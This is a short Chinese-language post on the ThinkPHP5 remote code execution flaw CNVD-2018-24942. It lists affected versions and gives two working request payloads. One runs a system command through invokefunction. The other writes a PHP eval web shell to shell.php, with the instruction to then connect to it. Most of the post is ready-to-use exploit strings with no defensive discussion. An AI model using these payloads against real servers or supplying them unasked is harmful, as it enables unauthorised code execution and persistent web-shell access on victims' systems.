ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)

ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)

kalilm 684 2022-03-22

影响范围
ThinkPHP 5.0.全版本 5.0.13~5.0.19的,
这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。
418901335e5ebb61889ad1878e3c6a0.png

远程代码执行

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

16479472311.jpg

在后面写入shell

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[123])?%3E

然后直接连接